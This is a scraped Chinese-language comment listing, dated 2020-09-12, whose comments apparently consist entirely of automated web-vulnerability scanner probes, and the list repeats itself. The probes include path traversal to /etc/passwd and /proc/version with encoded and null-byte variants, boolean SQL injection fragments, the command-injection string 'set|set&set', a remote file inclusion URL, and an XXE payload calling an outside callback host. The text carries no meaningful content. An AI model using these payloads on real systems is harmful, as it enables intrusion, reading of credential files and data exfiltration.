共 252 条评论 相关评论
2020-09-12
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
-4473) OR 6405=8099 AND (XJtt=XJtt
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
../../../../../../../../../../etc/passwd%00.jpg
-2645 OR 6244=6244
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
testasp.vulnweb.com
-3313 OR 7955=5979
set|set&set
"49kdapxqw
../../../../../../../../../../../../../../../proc/version
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY % xxe SYSTEM "http://rndsjqiazigzj.9b5501a3.axss.xyz/">%xxe]>
-9749) OR 6244=6244 AND (6919=6919
7g7aan517
http://testasp.vulnweb.com/t/fit.txt%3F.jpg
../../../../../../../../../../etc/passwd
`set|set&set`
-6653) OR 3431=1111 AND (7588=7588
-7360
共 252 条评论 相关评论
2020-09-12
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
2020-09-12
-4473) OR 6405=8099 AND (XJtt=XJtt
2020-09-12
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
2020-09-12
../../../../../../../../../../etc/passwd%00.jpg
2020-09-12
-2645 OR 6244=6244
2020-09-12
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
2020-09-12
testasp.vulnweb.com
2020-09-12
-3313 OR 7955=5979
2020-09-12
set|set&set
2020-09-12
"49kdapxqw
2020-09-12
../../../../../../../../../../../../../../../proc/version
2020-09-12
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY % xxe SYSTEM "http://rndsjqiazigzj.9b5501a3.axss.xyz/">%xxe]>
2020-09-12
-9749) OR 6244=6244 AND (6919=6919
2020-09-12
7g7aan517
2020-09-12
http://testasp.vulnweb.com/t/fit.txt%3F.jpg
2020-09-12
../../../../../../../../../../etc/passwd
2020-09-12
`set|set&set`
2020-09-12
-6653) OR 3431=1111 AND (7588=7588
2020-09-12
set|set&set
2020-09-12
-7360